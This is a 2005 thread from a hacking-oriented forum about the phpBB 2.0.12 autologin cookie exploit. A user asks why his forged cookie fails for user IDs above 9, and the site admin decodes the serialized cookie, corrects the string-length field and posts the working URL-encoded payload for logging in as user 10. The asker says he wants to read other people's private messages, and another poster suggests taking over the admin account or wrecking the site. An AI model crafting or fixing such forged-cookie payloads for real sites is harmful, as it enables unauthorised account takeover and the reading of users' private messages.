|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
The .12 exploit. Quick question. |
|
Posted: Thu Mar 31, 2005 10:04 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
I noticed that if you try to change user ID >9 the exploit stops working.
Is there a way arround this? or am I missing somthing when creating the cookie? |
|
|
|
|
Posted: Fri Apr 01, 2005 12:11 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Dude just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. Its your call. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Fri Apr 01, 2005 3:52 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
Quote: | Dude just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. Its your call. |
See thats my problem, not all websites have an admin user <9. So i try to login and it just doesnt work.
example:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%2210%22%3B%7D
That should if im doing this right log me into user 10, however it just logs me in as guest.
Im not interested in screwing sites up, just reading a few pm's . |
|
|
|
|
|
|
|
|
Posted: Sat Apr 02, 2005 1:30 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
devn00b wrote: | Quote: | Dude just edit admin to the way you want or login as admin and then change the user through the admin panel. Or just screw the site up. Its your call. |
See thats my problem, not all websites have an admin user <9. So i try to login and it just doesnt work.
example:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%2210%22%3B%7D
That should if im doing this right log me into user 10, however it just logs me in as guest.
Im not interested in screwing sites up, just reading a few pm's . |
If you urldecode() that stuff, you get this:
Code: |
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"10";}
|
This is serialized data and you can see, that it says "string with length 1 char and with value '10' ". Can you spot the error ?
Right version is this:
Code: |
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:2:"10";}
|
And in urlencoded style it will be as
Code: |
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A2%3A%2210%22%3B%7D
|
See ya! |
|
|
|
|
|
|
|
|
Posted: Sat Apr 02, 2005 10:03 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
Hey thanks for the response Waraxe. I knew it was somthing dumb I was missing. Isnt that always the case? |
|
|
|
|
Posted: Sun Apr 03, 2005 10:27 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
devn00b wrote: | Hey thanks for the response Waraxe. I knew it was somthing dumb I was missing. Isnt that always the case? |
LOL , sometimes maybe you just to nervous |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Tue Apr 05, 2005 5:38 pm |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
Okay last question I swear. Ive noticed a strange cookie from some sites
s%3A0%3A%22%22%3B wich = s:0:"";
is this exploitable if i do some modifications to the normal cookie sploit? |
|
|
|
|
Posted: Wed Apr 06, 2005 11:27 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
You sure its not a forum with the 2.0.13 fix on? Maybe heavily modified forums? |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Wed Apr 06, 2005 1:04 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
devn00b wrote: | Okay last question I swear. Ive noticed a strange cookie from some sites
s%3A0%3A%22%22%3B wich = s:0:"";
is this exploitable if i do some modifications to the normal cookie sploit? |
Maybe this cookie is set up, when user have anonymous status (i mean, does not have uid/uname). |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|